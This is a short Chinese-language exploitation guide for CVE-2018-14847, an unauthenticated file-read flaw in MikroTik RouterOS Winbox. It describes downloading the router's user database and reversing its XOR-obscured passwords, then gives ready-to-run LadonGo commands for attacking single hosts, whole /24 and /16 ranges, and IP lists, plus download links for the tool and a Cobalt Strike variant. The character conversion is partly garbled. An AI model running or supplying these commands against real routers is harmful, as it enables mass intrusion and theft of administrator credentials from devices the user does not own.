漏洞介紹
相關的技術讨論作者在 21 May 2018 日就以文章的形式詳細闡述 https://n0p.me/winbox-bug-dissection/ ,漏洞大緻是這樣的:
Winbox申請登入以後會從RouterOS裡面下載下傳一些适用于目前版本的ROS的DLL檔案作為Winbox的功能子產品來執行,但是這個下載下傳行為沒有恰當的鑒權,通過精心構造的請求包,可以下載下傳任意檔案,包括RouterOS的使用者資料庫檔案。
RouterOS的使用者資料庫存儲的密碼沒有使用标準的加密方式加密,隻是把密碼原文和 md5(使用者名 + “283i4jfkai3389”) 做了一次XOR運算,運算結果完全可逆,幾乎可以認為是明文存儲了密碼,使用LadonGo的CVE-2018-14847 EXP可以直接還原出明文密碼,導緻路由器淪陷。
影響範圍 6.29 (release date: 2015/28/05) to 6.42 (release date 2018/04/20)
RouterOS下載下傳
https://download2.mikrotik.com/routeros/6.38.4/mikrotik-6.38.4.iso
單IP利用
Ladon 192.168.1.50 CVE-2018-14847
Ladon CVE-2018-14847 192.168.1.50
Ladon CVE-2018-14847 192.168.1.50 8291
批量利用
Ladon 192.168.1.50/24 CVE-2018-14847 C段
Ladon 192.168.1.50/c CVE-2018-14847 C段
Ladon 192.168.1.50/b CVE-2018-14847 B段
Ladon ip.txt CVE-2018-14847 IP.TXT
[外鍊圖檔轉存失敗,源站可能有防盜鍊機制,建議将圖檔儲存下來直接上傳(img-xLnowdGe-1626361974014)(http://k8gege.org/k8img/LadonGo/exp/IPtxt_CVE-2018-14847.PNG)]
Download
LadonGo (ALL OS)
https://github.com/k8gege/LadonGo/releases
Ladon (Windows & Cobalt Strike)
曆史版本: https://github.com/k8gege/Ladon/releases
7.0版本:http://k8gege.org/Download
8.0版本:K8小密圈